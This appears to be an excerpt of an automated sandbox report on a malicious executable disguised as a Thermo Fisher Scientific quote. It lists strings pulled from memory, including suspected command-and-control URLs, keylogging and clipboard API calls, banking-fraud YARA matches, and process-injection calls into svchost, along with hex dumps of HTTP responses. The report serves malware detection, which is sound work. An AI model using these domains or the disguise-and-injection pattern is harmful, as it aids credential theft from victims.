2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:22 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:24 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 20:11:27 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: mobsync.exe, 00000005.00000002.3904399243.0000000004EA6000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003416000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3905763155.0000000005333000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightvision.website/gn26/
                Source: mobsync.exe, 00000005.00000002.3906187965.0000000007290000.00000004.00000800.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.000000000373A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/g3h7/?sVC8z=dyqW
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000035A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY
                Source: mobsync.exe, 00000005.00000002.3904399243.000000000535C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.00000000038CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000005.00000002.3904399243.0000000005680000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003BF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033D
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033r
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 00000005.00000002.3902827656.00000000028B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 00000005.00000003.2461065486.0000000007518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: mobsync.exe, 00000005.00000003.2465679291.000000000753E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: mobsync.exe, 00000005.00000002.3904399243.0000000005812000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000003D82000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00656B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00656D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00642B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0066F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00603D19
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000000.2037258561.00000000006AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_0a5d4e87-d
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000000.2037258561.00000000006AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: cSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_cbd7272c-a
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_17fbe505-5
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_afaeb87a-b
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C483 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E80 NtReadVirtualMemory
